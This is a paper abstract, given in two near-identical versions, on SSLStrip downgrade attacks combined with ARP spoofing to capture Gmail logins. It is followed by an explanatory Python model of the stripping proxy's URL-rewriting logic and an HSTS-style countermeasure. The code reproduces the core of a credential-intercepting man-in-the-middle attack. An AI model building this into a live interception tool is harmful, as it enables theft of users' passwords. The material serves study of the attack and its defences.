The Secure Sockets Layer (SSL) protocol is a key protocol for securing Internet communication and is generally used to transmit sensitive data; because it encrypts and authenticates the information, it offers a high level of security. SSL attacks are usually carried out by forging X.509 certificates in a man-in-the-middle position, but the browser then displays a warning dialog; a more covert form of SSL session hijacking that has recently appeared avoids this problem. This paper describes the principle of that attack, demonstrates how the SSLStrip tool combined with ARP spoofing can be used to obtain Gmail users' information in a LAN environment, carries out security tests on Firefox and Chrome, points out the security risks of conducting SSL sessions through a browser, and finally provides relevant countermeasures.
The SSL protocol, a key protocol for achieving Internet communication security, is generally used for the transmission of sensitive data. It offers high security because it encrypts and authenticates that data. The usual method of SSL attack is to forge X.509 certificates from a man-in-the-middle position; however, the browser then usually shows warning indicators. Recently, a more covert method of SSL attack has appeared that avoids this warning. The paper describes the principle of the attack and demonstrates the use of SSLStrip to capture Gmail passwords in a LAN environment. Security tests are also carried out on Firefox and Chrome, and finally some preventive measures against the attack are provided.
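The downgrade that the abstract describes is easiest to see as code. The following Python model, which is an added illustration and not the paper's own code nor the SSLStrip tool's source, performs the two operations at the heart of the attack: every `https://` URL the real server sends back (in the page body and in `Location` headers) is rewritten to `http://` before it reaches the victim, and the mapping is remembered so that when the victim later requests the plain-HTTP URL, the attacker's proxy fetches the original HTTPS URL from the server itself. The victim's browser therefore never sees a certificate at all, which is why no warning appears. The sample response, the hostnames under `example.com`, and the `hsts_hosts` set are constructed for the example; the last function models the countermeasure in which a browser that already knows a host requires HTTPS (an HSTS policy, an assumption added here, not something the abstract names) refuses to send the downgraded request in plaintext.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed sample: a simplified login page and headers as the real
# server would return them to the attacker's proxy over HTTPS.
SAMPLE_RESPONSE_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "Location": "https://accounts.example.com/login",
}
SAMPLE_HTML = b"""<html><body>
<form action="https://accounts.example.com/ServiceLogin" method="post">
<a href="https://mail.example.com/mail/">Inbox</a>
<a href="http://www.example.com/help">Help</a>
</body></html>"""


class SslStripProxy:
    """Minimal model of the SSLStrip downgrade.

    The proxy sits between the victim (reached via ARP spoofing on the LAN)
    and the real server. It keeps its own HTTPS session to the server and
    hands the victim a plain-HTTP copy of everything, so the victim's browser
    is never asked to validate a certificate and never shows a warning.
    """

    def __init__(self):
        # downgraded http:// URL -> original https:// URL the server sent
        self.stripped = {}

    def strip_url(self, url: str) -> str:
        """Rewrite one https:// URL to http:// and remember the original."""
        parts = urlsplit(url)
        if parts.scheme != "https":
            return url  # already plaintext; nothing to do
        downgraded = urlunsplit(("http",) + tuple(parts[1:]))
        self.stripped[downgraded] = url
        return downgraded

    def rewrite_body(self, html: bytes) -> bytes:
        """Downgrade every https:// link in a response body (form actions, hrefs)."""
        return re.sub(
            rb"https://[^\s\"'<>]+",
            lambda m: self.strip_url(m.group(0).decode()).encode(),
            html,
        )

    def rewrite_headers(self, headers: dict) -> dict:
        """Downgrade redirect targets so a 3xx to HTTPS also stays in plaintext."""
        out = {}
        for name, value in headers.items():
            if name.lower() == "location":
                value = self.strip_url(value)
            out[name] = value
        return out

    def upstream_url(self, requested: str) -> str:
        """When the victim requests a downgraded URL, fetch the real HTTPS one."""
        return self.stripped.get(requested, requested)


def browser_request_url(url: str, hsts_hosts: set) -> str:
    """Model of the client-side countermeasure (assumption added here).

    A browser that already knows a host must only be reached over HTTPS
    upgrades the downgraded link before sending anything, so the attacker's
    proxy never sees the plaintext request it was waiting for.
    """
    parts = urlsplit(url)
    if parts.scheme == "http" and parts.hostname in hsts_hosts:
        return urlunsplit(("https",) + tuple(parts[1:]))
    return url


if __name__ == "__main__":
    proxy = SslStripProxy()
    print(proxy.rewrite_body(SAMPLE_HTML).decode())
    print(proxy.rewrite_headers(SAMPLE_RESPONSE_HEADERS))
    # The victim submits the login form to the http:// action; the proxy
    # forwards it to the original https:// endpoint and reads the password.
    print(proxy.upstream_url("http://accounts.example.com/ServiceLogin"))
```

Run the block directly to see the rewritten page; the `stripped` table is the whole state the attack needs, which is why the paper's LAN demonstration only requires ARP spoofing plus this proxy and no forged certificate. The same model also shows the limit of a browser test: Firefox and Chrome both render the downgraded page without complaint, because from their point of view they were simply given an HTTP site.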